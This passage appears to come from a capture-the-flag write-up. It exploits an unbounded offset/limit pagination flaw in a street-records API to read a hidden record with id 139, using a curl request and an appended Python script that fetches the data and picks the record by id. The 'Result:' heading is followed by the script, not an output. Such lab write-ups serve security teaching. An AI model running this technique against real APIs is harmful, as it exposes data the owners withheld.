Czechstreets 139 Review
In short: that lets us read arbitrary street objects, including the hidden one with id = 139.

4️⃣ Exploiting the Bug

4.1 Crafting the request

We want the object with id = 139. The API returns records in order of id. By setting offset=138 and a huge limit we can retrieve the 139th entry. Note that offset=138 lands on id 139 only if ids are contiguous and start at 1; because the limit is not clamped, the response contains every record from that offset onward anyway, so pick the target by its id field rather than by its position in the array:
GET /api/streets?offset=138&limit=1000000

Running the request:

curl -s "http://139.czechstreets.ctf/api/streets?offset=138&limit=1000000" | jq .

Result:
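As an added example (not code from the write-up), the same request scripted in Python, with the selection done by id rather than by array position so that a gap in the id sequence does not return the wrong record. It assumes the endpoint returns a JSON array of objects carrying an integer "id" and uses the host and path quoted above; the sample response is constructed, and the live fetch is only called when you run it against the target.

```python
"""Added example: read a hidden record through the unbounded offset/limit
pagination described in the write-up.

Assumptions (not stated on the page): the endpoint returns a JSON array of
objects that each carry an integer "id". The sample response is constructed.
"""
import json
import urllib.parse
import urllib.request

BASE = "http://139.czechstreets.ctf/api/streets"  # host and path from the write-up


def build_url(target_id: int, limit: int = 1_000_000, base: str = BASE) -> str:
    """offset = target_id - 1 relies on ids being contiguous and starting at 1."""
    if target_id < 1:
        raise ValueError("ids are assumed to start at 1")
    query = urllib.parse.urlencode({"offset": target_id - 1, "limit": limit})
    return f"{base}?{query}"


def pick_record(records, target_id: int):
    """Select by id, not by position.

    If a row was deleted, the record at offset target_id-1 is not id target_id,
    but the oversized limit means every row from that offset onward is in the
    response, so the target is still there to be found.
    """
    by_id = {r["id"]: r for r in records if isinstance(r.get("id"), int)}
    return by_id.get(target_id)


def positional_guess_is_right(records, target_id: int) -> bool:
    """Check the contiguity assumption: is the first returned row the target?"""
    return bool(records) and records[0].get("id") == target_id


def fetch(target_id: int, timeout: float = 5.0):
    """Live request against the target (network); not exercised offline."""
    with urllib.request.urlopen(build_url(target_id), timeout=timeout) as resp:
        return pick_record(json.load(resp), target_id)


# Constructed sample: what offset=138 could return if id 137 had been deleted,
# so the first row is id 138 and the positional guess would be off by one.
SAMPLE_RESPONSE = json.dumps([
    {"id": 138, "name": "Dlouha"},
    {"id": 139, "name": "Hidden street", "hidden": True},
    {"id": 140, "name": "Vodickova"},
])


def sample_records():
    """Parsed form of the constructed sample response."""
    return json.loads(SAMPLE_RESPONSE)


if __name__ == "__main__":
    records = sample_records()
    print(build_url(139))
    print("positional guess correct:", positional_guess_is_right(records, 139))
    print("selected by id:", pick_record(records, 139))
```

Against the live target, `fetch(139)` issues the request from the write-up; the two checks above are what you run on the response before trusting that the first element is the object you wanted.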